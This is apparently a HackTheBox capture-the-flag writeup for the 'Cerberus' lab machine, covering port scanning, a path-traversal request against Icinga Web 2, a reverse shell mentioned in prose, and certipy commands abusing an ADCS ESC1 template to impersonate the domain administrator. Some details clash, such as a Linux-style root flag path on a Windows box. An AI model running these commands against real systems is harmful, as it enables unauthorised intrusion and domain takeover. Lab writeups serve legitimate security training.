LinkedIn 
HackTheBox 
GitHub HTB Writeup — Cerberus
Full walkthrough of the HackTheBox Cerberus machine covering initial enumeration, SSRF exploitation, and privilege escalation through a misconfigured AD certificate template.
HackTheBox: Cerberus
Difficulty: Hard
OS: Windows
Key Topics: SSRF, Active Directory Certificate Services, Kerberos
Enumeration
Starting with a full port scan reveals a web service on port 8080 and standard AD services.
nmap -sCV -p- -T4 10.10.11.xxx -oN cerberus.nmapInteresting findings:
- Port 8080 — Icinga Web 2 monitoring dashboard
- Port 88 — Kerberos
- Port 445 — SMB (signing required)
Initial Foothold
The Icinga instance is vulnerable to CVE-2022-24715 — an authenticated SSRF that can be chained with a file read to extract credentials from the internal management interface.
# Exploit the SSRF to hit the internal API
curl -k "https://target:8080/icingaweb2/lib/icinga/..%2f..%2f..%2fetc/icinga2/features-enabled/api.conf"Lateral Movement
With the extracted API credentials, we authenticate to the Icinga2 API and trigger a reverse shell via a custom check command.
Privilege Escalation
The domain has a misconfigured certificate template (ESC1) allowing any authenticated user to request a certificate as the Domain Admin.
certipy find -u user@cerberus.htb -p 'P@ssword' -dc-ip 10.10.11.xxx
certipy req -u user@cerberus.htb -p 'P@ssword' -ca CERBERUS-CA -template VulnTemplate -upn administrator@cerberus.htbRoot Flag
cat /root/root.txt
# [REDACTED]Lessons Learned
- Always check for ADCS misconfigurations — ESC1 through ESC8 are common in enterprise environments.
- SSRF is often underestimated; chained with internal services, it can lead to full compromise.